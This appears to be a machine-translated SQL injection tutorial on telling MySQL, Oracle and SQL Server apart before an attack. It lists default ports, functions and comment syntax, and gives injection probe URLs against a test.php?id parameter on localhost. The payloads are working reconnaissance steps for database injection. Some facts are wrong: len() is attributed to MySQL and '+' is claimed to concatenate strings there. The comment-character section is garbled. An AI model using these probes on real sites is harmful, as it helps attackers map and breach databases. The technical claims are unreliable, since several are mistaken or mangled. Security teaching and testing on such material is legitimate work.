Preface
Before performing SQL injection, you should first determine the type of database. Different databases have some subtle differences when processing some functions. Only by determining which database type, can we choose the appropriate function according to the type of database. Easy to implement SQL injection.
Front end and database type
asp:SQL Server,Access
.net:SQL Server
php:MySQL,PostgreSQL
java:Oracle,MySQL
Judging by port
Oracle : default port 1521
SQL Server : default port 1433
MySQL : default port 3306
Judging by database-specific functions
len和length
len(): SQL Server, MySQL and db2 return length function.
length(): Oracle and INFORMIX return length function.
version和@@version
version(): MySQL query version information function
@@version: MySQL and SQL Server query version information function
substring和substr
Both MySQL functions can be used
Oracle can only call substr
SQL Server can only call substring
Judgment based on special symbols
/*The comment character of MySQL database is the comment character
--supported by Oracle and SQL Server
;is the clause query identifier. Oracle does not support multi-line query. If an error is returned, it means that the Oracle database
#is a comment character in MySQL. If an error is returned, it means that It may not be MySQL, but also supports --and/**/
Judging according to the way the database handles the string
- MySQL
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab'
http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab'
- Oracle
http://127.0.0.1/test.php?id=1 and 'a'||'b'='ab'
http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab'
- SQL Server
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab'
Judging according to the specific data table of the database
- MySQL(version>5.0)
http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1
- Oracle
http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1
- SQL Server
http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1